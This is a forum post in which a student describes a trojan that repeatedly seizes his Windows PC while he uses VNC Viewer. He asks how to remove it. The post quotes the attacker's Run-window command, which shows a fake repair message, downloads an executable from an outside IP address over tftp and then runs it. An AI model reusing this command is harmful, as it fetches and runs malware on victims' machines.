Hey guys. I've bene using the VNC Viewer software to access a Linux environment at my University's Linux servers.
However, I have over the last few days had a number of occurances of a Trojan somehow finding its way onto my computer. At some point I would suddenly lose control of the computer. A Task Manager window would come up, followed by a run window. In this run window the following two things are entered:
%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i
64.79.213.12 GET ktqjy.exe & start ktqjy&%systemroot%\\system32\\cmd.exe
In the past I have always been at my computer, so I have been able to interrupt it by just turning the computer off before it can do that it is trying to do. Following the last occurance I spent all afternoon running virus scans and spyware scans using:
AVG Anti virus AVG anti spyware Zonealarm Pro's spyware scanner Spybot Search and Destroy
A Trojan was found (called Generic3.ARX) by AVG and a number of Spyware items were found and deleted. Satisfied that allw as well, I opened up the VNC Viewer software and got back to work.
However, today whilst I went away to get a drink the Trojan ran again. This time I was unable to interrupt it and I came back to find a Task manager window, a run window and a command prompt all open. Clearly whatever the Trojan tries to do it has succeeded. I am running both AVG anti virus and anti spyware scans at the moment but nothing appears to be coming up this time.
Therefore, what can I do to eradicate whatever this Trojan has done to my computer? What sort of things would this Trojan do? (or begin doing as we speak?). Simply stop using VNC Viewer is not an option as I need it to do my coursework.
I run the latest version of ZoneAlarm Pro along with the other programmes mentioned above to combat spyware.
Kind regards,
Matt